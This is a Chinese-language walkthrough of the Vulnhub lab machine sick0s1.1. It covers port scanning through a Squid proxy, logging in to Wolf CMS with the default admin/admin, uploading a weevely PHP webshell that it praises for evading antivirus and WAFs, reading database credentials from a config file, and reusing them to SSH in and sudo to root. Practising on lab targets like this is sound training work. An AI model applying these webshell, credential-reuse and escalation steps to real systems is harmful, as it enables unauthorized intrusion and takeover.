Vulnhub系列-sick0s1.1

靶机:192.168.12.130
kali: 192.168.249.128

一、信息收集

nmap -sV 192.168.12.130 –扫描开放端口
请添加图片描述3128端口是作为代理
请添加图片描述dirsearch -u http://192.168.12.130 --proxy=192.168.12.130:3128 –扫下web目录
请添加图片描述扫到robots.txt请添加图片描述

Wolf CMS
请添加图片描述后台管理:?/admin
请添加图片描述一试就出来了–弱口令:admin/admin

Wolfcms 0.8.2中存在任意文件上传漏洞

weevely是适用于php网站的webshell工具,使用weevely生成的木马免杀能力较强,而且使用加密连接,往往能轻松突破WAF拦截。(又学到一个工具)
weevely generate 666 yasso.php –密码666
请添加图片描述–上传–请添加图片描述
请添加图片描述weevely连接木马(需要开启代理)

export http_proxy=http://192.168.12.130:3128 –配置代理
请添加图片描述

请添加图片描述
打完靶机切记删除代理!!!

unset http_proxy –删除代理

weevely http://192.168.12.130/wolfcms/public/yasso.php 666 –连接木马
请添加图片描述

二、提权

cd /var/www/wolfcms–/var/www/wolfcms目录下面发现数据库配置文件
请添加图片描述
发现用户名/密码=root/john@123
请添加图片描述
貌似只允许本地连接
请添加图片描述cat /etc/passwd | grep /bin/bash –查看当前用户
请添加图片描述
发现sickos用户

root数据库密码即sickos密码

ssh [email protected] ssh连接

sudo su –输入sickos密码
请添加图片描述
成功root

本图文内容来源于网友网络收集整理提供,作为学习参考使用,版权属于原作者。
THE END
分享
二维码
< <上一篇
下一篇>>